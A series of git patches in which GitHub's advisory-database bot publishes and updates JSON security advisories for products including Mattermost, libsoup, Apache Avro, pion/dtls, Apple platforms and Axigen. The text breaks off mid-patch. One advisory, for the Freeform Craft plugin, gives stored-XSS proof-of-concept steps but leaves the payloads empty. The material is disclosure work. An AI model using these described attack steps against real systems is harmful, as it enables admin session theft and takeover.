From aec00c2cbd4cb8041a8dfed18a91fa93bd740c3e Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 09:32:11 +0000 Subject: [PATCH 01/36] Publish GHSA-qvpr-vq7h-28cr --- .../GHSA-qvpr-vq7h-28cr.json | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-qvpr-vq7h-28cr/GHSA-qvpr-vq7h-28cr.json diff --git a/advisories/unreviewed/2026/02/GHSA-qvpr-vq7h-28cr/GHSA-qvpr-vq7h-28cr.json b/advisories/unreviewed/2026/02/GHSA-qvpr-vq7h-28cr/GHSA-qvpr-vq7h-28cr.json new file mode 100644 index 0000000000000..f232b9034d423 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qvpr-vq7h-28cr/GHSA-qvpr-vq7h-28cr.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qvpr-vq7h-28cr", + "modified": "2026-02-13T09:30:15Z", + "published": "2026-02-13T09:30:14Z", + "aliases": [ + "CVE-2026-0872" + ], + "details": "Improper Certificate Validation vulnerability in Thales SafeNet Agent for Windows Logon on Windows allows Signature Spoofing by Improper Validation.This issue affects SafeNet Agent for Windows Logon: 4.0.0, 4.1.1, 4.1.2.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:H/SI:H/SA:L/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0872" + }, + { + "type": "WEB", + "url": "https://supportportal.thalesgroup.com/csm?sys_kb_id=247fd4a42b4a7290061af3f5f291bff1&id=kb_article_view&sysparm_rank=1&sysparm_tsqueryId=5ecb72c73b927610381ecfaf55e45a0b&sysparm_article=KB0030173" + }, + { + "type": "WEB", + "url": "https://thalesdocs.com/sta/agents/wla-windows_logon/wla-preinstallation_passwordless/index.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T09:16:07Z" + } +} \ No newline at end of file From 515754e9afb8551fdf6e84f7066241d3b1663533 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 12:33:19 +0000 Subject: [PATCH 02/36] Publish Advisories GHSA-2xf7-hmf6-p64j GHSA-9pj7-jh2r-87g8 GHSA-hg24-p7xv-jhq8 GHSA-rp46-r563-jrc7 --- .../GHSA-2xf7-hmf6-p64j.json | 36 +++++++++++++++++ .../GHSA-9pj7-jh2r-87g8.json | 36 +++++++++++++++++ .../GHSA-hg24-p7xv-jhq8.json | 40 +++++++++++++++++++ .../GHSA-rp46-r563-jrc7.json | 31 ++++++++++++++ 4 files changed, 143 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9pj7-jh2r-87g8/GHSA-9pj7-jh2r-87g8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hg24-p7xv-jhq8/GHSA-hg24-p7xv-jhq8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json diff --git a/advisories/unreviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json b/advisories/unreviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json new file mode 100644 index 0000000000000..95e68291c6dcf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-2xf7-hmf6-p64j/GHSA-2xf7-hmf6-p64j.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2xf7-hmf6-p64j", + "modified": "2026-02-13T12:31:21Z", + "published": "2026-02-13T12:31:21Z", + "aliases": [ + "CVE-2026-20796" + ], + "details": "Mattermost versions 10.11.x <= 10.11.9 fail to properly validate channel membership at the time of data retrieval which allows a deactivated user to learn team names they should not have access to via a race condition in the /common_teams API endpoint.. Mattermost Advisory ID: MMSA-2025-00549", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20796" + }, + { + "type": "WEB", + "url": "https://mattermost.com/security-updates" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-367" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T11:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9pj7-jh2r-87g8/GHSA-9pj7-jh2r-87g8.json b/advisories/unreviewed/2026/02/GHSA-9pj7-jh2r-87g8/GHSA-9pj7-jh2r-87g8.json new file mode 100644 index 0000000000000..7bf26503735af --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9pj7-jh2r-87g8/GHSA-9pj7-jh2r-87g8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9pj7-jh2r-87g8", + "modified": "2026-02-13T12:31:21Z", + "published": "2026-02-13T12:31:21Z", + "aliases": [ + "CVE-2026-22892" + ], + "details": "Mattermost versions 11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1 fail to validate user permissions when creating Jira issues from Mattermost posts, which allows an authenticated attacker with access to the Jira plugin to read post content and attachments from channels they do not have access to via the /create-issue API endpoint by providing the post ID of an inaccessible post.. Mattermost Advisory ID: MMSA-2025-00550", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22892" + }, + { + "type": "WEB", + "url": "https://mattermost.com/security-updates" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T11:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hg24-p7xv-jhq8/GHSA-hg24-p7xv-jhq8.json b/advisories/unreviewed/2026/02/GHSA-hg24-p7xv-jhq8/GHSA-hg24-p7xv-jhq8.json new file mode 100644 index 0000000000000..0db353f7cace6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hg24-p7xv-jhq8/GHSA-hg24-p7xv-jhq8.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hg24-p7xv-jhq8", + "modified": "2026-02-13T12:31:21Z", + "published": "2026-02-13T12:31:21Z", + "aliases": [ + "CVE-2026-2443" + ], + "details": "A flaw was identified in libsoup, a widely used HTTP library in GNOME-based systems. When processing specially crafted HTTP Range headers, the library may improperly validate requested byte ranges. In certain build configurations, this could allow a remote attacker to access portions of server memory beyond the intended response. Exploitation requires a vulnerable configuration and access to a server using the embedded SoupServer component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2443" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2026-2443" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439671" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T12:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json b/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json new file mode 100644 index 0000000000000..c3e366958502c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rp46-r563-jrc7/GHSA-rp46-r563-jrc7.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rp46-r563-jrc7", + "modified": "2026-02-13T12:31:21Z", + "published": "2026-02-13T12:31:21Z", + "aliases": [ + "CVE-2025-33042" + ], + "details": "Improper Control of Generation of Code ('Code Injection') vulnerability in Apache Avro Java SDK when generating specific records from untrusted Avro schemas.\n\nThis issue affects Apache Avro Java SDK: all versions through 1.11.4 and versionĀ 1.12.0.\n\nUsers are recommended to upgrade to version 1.12.1 or 1.11.5, which fix the issue.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33042" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/fy88wmgf1lj9479vrpt12cv8x73lroj1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T12:16:07Z" + } +} \ No newline at end of file From d7e63b271d3d7419163046475898ebb606762591 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 14:20:38 +0000 Subject: [PATCH 03/36] Publish GHSA-9f3f-wv7r-qc8r --- .../GHSA-9f3f-wv7r-qc8r.json | 38 +++++++++++++++++-- 1 file changed, 34 insertions(+), 4 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json b/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json index f05345733c000..c4b1a394cd1e4 100644 --- a/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json +++ b/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9f3f-wv7r-qc8r", - "modified": "2026-02-12T22:07:22Z", + "modified": "2026-02-13T14:18:28Z", "published": "2026-02-11T15:13:12Z", "aliases": [ "CVE-2026-26014" @@ -25,13 +25,16 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "3.1.0" }, { - "fixed": "3.1.0" + "fixed": "3.1.1" } ] } + ], + "versions": [ + "3.1.0" ] }, { @@ -71,6 +74,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/pion/dtls/v3" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.0.11" + } + ] + } + ] } ], "references": [ @@ -90,13 +112,21 @@ "type": "WEB", "url": "https://github.com/pion/dtls/commit/61762dee8217991882c5eb79856b9e7a73ee349f" }, + { + "type": "WEB", + "url": "https://github.com/pion/dtls/commit/90e241cfec2985715efdd3d005972847462a67d6" + }, { "type": "PACKAGE", "url": "https://github.com/pion/dtls" }, { "type": "WEB", - "url": "https://github.com/pion/dtls/releases/tag/v3.1.0" + "url": "https://github.com/pion/dtls/releases/tag/v3.0.11" + }, + { + "type": "WEB", + "url": "https://github.com/pion/dtls/releases/tag/v3.1.1" } ], "database_specific": { From e912a16550074cae1167f82cfbfdf518d0871433 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 14:58:52 +0000 Subject: [PATCH 04/36] Publish GHSA-jp3q-wwp3-pwv9 --- .../GHSA-jp3q-wwp3-pwv9.json | 20 ++++++++++++++++--- 1 file changed, 17 insertions(+), 3 deletions(-) diff --git a/advisories/github-reviewed/2026/01/GHSA-jp3q-wwp3-pwv9/GHSA-jp3q-wwp3-pwv9.json b/advisories/github-reviewed/2026/01/GHSA-jp3q-wwp3-pwv9/GHSA-jp3q-wwp3-pwv9.json index fa33bbc866cc0..f090ff0e06d20 100644 --- a/advisories/github-reviewed/2026/01/GHSA-jp3q-wwp3-pwv9/GHSA-jp3q-wwp3-pwv9.json +++ b/advisories/github-reviewed/2026/01/GHSA-jp3q-wwp3-pwv9/GHSA-jp3q-wwp3-pwv9.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-jp3q-wwp3-pwv9", - "modified": "2026-02-10T13:47:10Z", + "modified": "2026-02-13T14:57:31Z", "published": "2026-01-22T21:41:14Z", - "aliases": [], + "aliases": [ + "CVE-2026-26188" + ], "summary": "Freeform Craft Plugin CP UI (builder/integrations) has Stored Cross-Site Scripting (XSS) issue", "details": "**Summary**\nAn authenticated, low-privilege user (able to create/edit forms) can inject arbitrary HTML/JS into the Craft Control Panel (CP) builder and integrations views. User-controlled form labels and integration metadata are rendered with `dangerouslySetInnerHTML` without sanitization, leading to stored XSS that executes when any admin views the builder/integration screens.\n\n**Affected Product**\n- Ecosystem: Packagist (Craft CMS plugin)\n- Package: solspace/craft-freeform\n- Version: <= 5.14.6 (latest observed). Likely all 5.x until patched.\n\n**Details**\n- Root cause: Multiple user-controlled strings (field labels, section labels, integration icons, short names, WYSIWYG previews) are injected into React components using `dangerouslySetInnerHTML` without sanitization.\n- Evidence: `dangerouslySetInnerHTML` on user-controlled properties in bundled CP JS at [packages/plugin/src/Resources/js/client/client.js](packages/plugin/src/Resources/js/client/client.js#L1).\n\n**PoCs**\n- Label-based XSS:\n 1. In Craft CP, create/edit a Freeform field and set its label to ``.\n 2. Open the form builder view containing the field.\n 3. Alert executes (stored XSS).\n- Integration icon SVG:\n 1. Set an integration \"icon SVG\" to ``.\n 2. Open the integrations CP view.\n 3. Script executes.\n\n**Impact**\nArbitrary JS in admin CP; session/CSRF token theft; potential full admin takeover via DOM-driven actions.\n\n**Remediation**\n- Sanitize/HTML-encode all user-controlled strings before passing to `dangerouslySetInnerHTML`, or avoid it for labels/titles/icons.\n- Server-side: strip/escape disallowed tags on save for fields, integration metadata, WYSIWYG content.\n- Add regression tests with `` payloads to ensure no execution in builder/integration views.\n\n**Workarounds**\n- Restrict form-edit permissions to trusted admins only until patched.\n- Consider CSP that disallows inline scripts (defense-in-depth only).\n\n**Credits**\n- Discovered by https://www.linkedin.com/in/praveenkavinda/ | Prav33N-Sec.", "severity": [ @@ -41,9 +43,21 @@ "type": "WEB", "url": "https://github.com/solspace/craft-freeform/security/advisories/GHSA-jp3q-wwp3-pwv9" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26188" + }, + { + "type": "WEB", + "url": "https://github.com/solspace/craft-freeform/commit/b9adad6cdf1eba5400aae8b1ae39bd7d4d33af5e" + }, { "type": "PACKAGE", "url": "https://github.com/solspace/craft-freeform" + }, + { + "type": "WEB", + "url": "https://github.com/solspace/craft-freeform/releases/tag/v5.14.7" } ], "database_specific": { @@ -53,6 +67,6 @@ "severity": "LOW", "github_reviewed": true, "github_reviewed_at": "2026-01-22T21:41:14Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-12T23:16:09Z" } } \ No newline at end of file From bc2ffab8a114dec112114cac6ae81cf3673edae1 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 15:32:20 +0000 Subject: [PATCH 05/36] Publish Advisories GHSA-mpwp-whhg-qqx4 GHSA-22m6-6xhc-4ffw GHSA-25c8-jwjc-6mjh GHSA-366r-6rjw-f277 GHSA-4m8q-p6h8-x2wj GHSA-4p49-fwp8-38mv GHSA-5m2c-5h5x-7j8g GHSA-8qwr-rrp6-9jjv GHSA-8xrx-9wj4-6775 GHSA-cqx4-h5ph-3xj9 GHSA-hpj8-5pv7-f58m GHSA-jh9m-9mr6-3ghc GHSA-jjrf-jfrm-p64x GHSA-pmfg-h9xp-96jh GHSA-q3vc-646j-prpq GHSA-r5cf-37x9-4hgv GHSA-rp46-r563-jrc7 GHSA-wp4v-6rrv-wqv9 GHSA-wxwg-9693-mqg4 GHSA-xgwv-vx48-69hc --- .../GHSA-mpwp-whhg-qqx4.json | 4 +- .../GHSA-22m6-6xhc-4ffw.json | 36 +++++++++++++ .../GHSA-25c8-jwjc-6mjh.json | 6 ++- .../GHSA-366r-6rjw-f277.json | 11 ++-- .../GHSA-4m8q-p6h8-x2wj.json | 11 ++-- .../GHSA-4p49-fwp8-38mv.json | 36 +++++++++++++ .../GHSA-5m2c-5h5x-7j8g.json | 6 ++- .../GHSA-8qwr-rrp6-9jjv.json | 6 ++- .../GHSA-8xrx-9wj4-6775.json | 11 ++-- .../GHSA-cqx4-h5ph-3xj9.json | 6 ++- .../GHSA-hpj8-5pv7-f58m.json | 11 ++-- .../GHSA-jh9m-9mr6-3ghc.json | 49 +++++++++++++++++ .../GHSA-jjrf-jfrm-p64x.json | 53 +++++++++++++++++++ .../GHSA-pmfg-h9xp-96jh.json | 3 +- .../GHSA-q3vc-646j-prpq.json | 36 +++++++++++++ .../GHSA-r5cf-37x9-4hgv.json | 11 ++-- .../GHSA-rp46-r563-jrc7.json | 6 ++- .../GHSA-wp4v-6rrv-wqv9.json | 11 ++-- .../GHSA-wxwg-9693-mqg4.json | 11 ++-- .../GHSA-xgwv-vx48-69hc.json | 36 +++++++++++++ 20 files changed, 332 insertions(+), 28 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-22m6-6xhc-4ffw/GHSA-22m6-6xhc-4ffw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4p49-fwp8-38mv/GHSA-4p49-fwp8-38mv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jh9m-9mr6-3ghc/GHSA-jh9m-9mr6-3ghc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jjrf-jfrm-p64x/GHSA-jjrf-jfrm-p64x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q3vc-646j-prpq/GHSA-q3vc-646j-prpq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xgwv-vx48-69hc/GHSA-xgwv-vx48-69hc.json diff --git a/advisories/unreviewed/2026/01/GHSA-mpwp-whhg-qqx4/GHSA-mpwp-whhg-qqx4.json b/advisories/unreviewed/2026/01/GHSA-mpwp-whhg-qqx4/GHSA-mpwp-whhg-qqx4.json index 85d3b133235be..0f75d1d732e20 100644 --- a/advisories/unreviewed/2026/01/GHSA-mpwp-whhg-qqx4/GHSA-mpwp-whhg-qqx4.json +++ b/advisories/unreviewed/2026/01/GHSA-mpwp-whhg-qqx4/GHSA-mpwp-whhg-qqx4.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-415" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-22m6-6xhc-4ffw/GHSA-22m6-6xhc-4ffw.json b/advisories/unreviewed/2026/02/GHSA-22m6-6xhc-4ffw/GHSA-22m6-6xhc-4ffw.json new file mode 100644 index 0000000000000..097b91a57a611 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-22m6-6xhc-4ffw/GHSA-22m6-6xhc-4ffw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-22m6-6xhc-4ffw", + "modified": "2026-02-13T15:30:27Z", + "published": "2026-02-13T15:30:27Z", + "aliases": [ + "CVE-2026-1578" + ], + "details": "HP App for Android is potentially vulnerable to cross-site scripting (XSS) when using an outdated version of the application via mobile devices. HP is releasing updates to mitigate these potential vulnerabilities.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1578" + }, + { + "type": "WEB", + "url": "https://support.hp.com/us-en/document/ish_14083522-14083606-16/hpsbgn04082" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T15:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-25c8-jwjc-6mjh/GHSA-25c8-jwjc-6mjh.json b/advisories/unreviewed/2026/02/GHSA-25c8-jwjc-6mjh/GHSA-25c8-jwjc-6mjh.json index df07d89ac6fc7..4220712a92a0b 100644 --- a/advisories/unreviewed/2026/02/GHSA-25c8-jwjc-6mjh/GHSA-25c8-jwjc-6mjh.json +++ b/advisories/unreviewed/2026/02/GHSA-25c8-jwjc-6mjh/GHSA-25c8-jwjc-6mjh.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-25c8-jwjc-6mjh", - "modified": "2026-02-05T21:32:39Z", + "modified": "2026-02-13T15:30:23Z", "published": "2026-02-05T18:30:30Z", "aliases": [ "CVE-2025-68722" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68722" }, + { + "type": "WEB", + "url": "https://github.com/osmancanvural/CVE-2025-68722" + }, { "type": "WEB", "url": "https://www.axigen.com/knowledgebase/Axigen-WebAdmin-CSRF-Vulnerability-CVE-2025-68722-_407.html" diff --git a/advisories/unreviewed/2026/02/GHSA-366r-6rjw-f277/GHSA-366r-6rjw-f277.json b/advisories/unreviewed/2026/02/GHSA-366r-6rjw-f277/GHSA-366r-6rjw-f277.json index d4979bea0bd98..1ba079289f53f 100644 --- a/advisories/unreviewed/2026/02/GHSA-366r-6rjw-f277/GHSA-366r-6rjw-f277.json +++ b/advisories/unreviewed/2026/02/GHSA-366r-6rjw-f277/GHSA-366r-6rjw-f277.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-366r-6rjw-f277", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T15:30:23Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20646" ], "details": "A logging issue was addressed with improved data redaction. This issue is fixed in macOS Tahoe 26.3. A malicious app may be able to read sensitive location information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:07Z" diff --git a/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json b/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json index c9a3d93f490a4..406dcef173473 100644 --- a/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json +++ b/advisories/unreviewed/2026/02/GHSA-4m8q-p6h8-x2wj/GHSA-4m8q-p6h8-x2wj.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4m8q-p6h8-x2wj", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-13T15:30:24Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20654" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An app may be able to cause unexpected system termination.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -37,7 +42,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-4p49-fwp8-38mv/GHSA-4p49-fwp8-38mv.json b/advisories/unreviewed/2026/02/GHSA-4p49-fwp8-38mv/GHSA-4p49-fwp8-38mv.json new file mode 100644 index 0000000000000..96a1aaa4dd87b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4p49-fwp8-38mv/GHSA-4p49-fwp8-38mv.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4p49-fwp8-38mv", + "modified": "2026-02-13T15:30:26Z", + "published": "2026-02-13T15:30:26Z", + "aliases": [ + "CVE-2026-1618" + ], + "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Universal Software Inc. FlexCity/Kiosk allows Privilege Escalation.This issue affects FlexCity/Kiosk: from 1.0 before 1.0.36.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1618" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0065" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-288" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T14:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5m2c-5h5x-7j8g/GHSA-5m2c-5h5x-7j8g.json b/advisories/unreviewed/2026/02/GHSA-5m2c-5h5x-7j8g/GHSA-5m2c-5h5x-7j8g.json index b80d4bf5b5be7..aec71790559c2 100644 --- a/advisories/unreviewed/2026/02/GHSA-5m2c-5h5x-7j8g/GHSA-5m2c-5h5x-7j8g.json +++ b/advisories/unreviewed/2026/02/GHSA-5m2c-5h5x-7j8g/GHSA-5m2c-5h5x-7j8g.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5m2c-5h5x-7j8g", - "modified": "2026-02-05T21:32:39Z", + "modified": "2026-02-13T15:30:23Z", "published": "2026-02-05T18:30:30Z", "aliases": [ "CVE-2025-68721" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68721" }, + { + "type": "WEB", + "url": "https://github.com/osmancanvural/CVE-2025-68721" + }, { "type": "WEB", "url": "https://www.axigen.com/knowledgebase/Axigen-WebAdmin-Improper-Access-Control-Vulnerability-CVE-2025-68721-_406.html" diff --git a/advisories/unreviewed/2026/02/GHSA-8qwr-rrp6-9jjv/GHSA-8qwr-rrp6-9jjv.json b/advisories/unreviewed/2026/02/GHSA-8qwr-rrp6-9jjv/GHSA-8qwr-rrp6-9jjv.json index 3cea669a88c23..daa49651bebb5 100644 --- a/advisories/unreviewed/2026/02/GHSA-8qwr-rrp6-9jjv/GHSA-8qwr-rrp6-9jjv.json +++ b/advisories/unreviewed/2026/02/GHSA-8qwr-rrp6-9jjv/GHSA-8qwr-rrp6-9jjv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8qwr-rrp6-9jjv", - "modified": "2026-02-10T15:30:21Z", + "modified": "2026-02-13T15:30:23Z", "published": "2026-02-05T18:30:32Z", "aliases": [ "CVE-2025-68723" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68723" }, + { + "type": "WEB", + "url": "https://github.com/osmancanvural/CVE-2025-68723" + }, { "type": "WEB", "url": "https://www.axigen.com/knowledgebase/Axigen-WebAdmin-Stored-XSS-Vulnerabilities-CVE-2025-68723-_408.html" diff --git a/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json b/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json index f074b5365ed5c..583c0515f5221 100644 --- a/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json +++ b/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8xrx-9wj4-6775", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T15:30:23Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20649" ], "details": "A logging issue was addressed with improved data redaction. This issue is fixed in watchOS 26.3, iOS 26.3 and iPadOS 26.3, tvOS 26.3, macOS Tahoe 26.3. A user may be able to view sensitive user information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -33,7 +38,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, 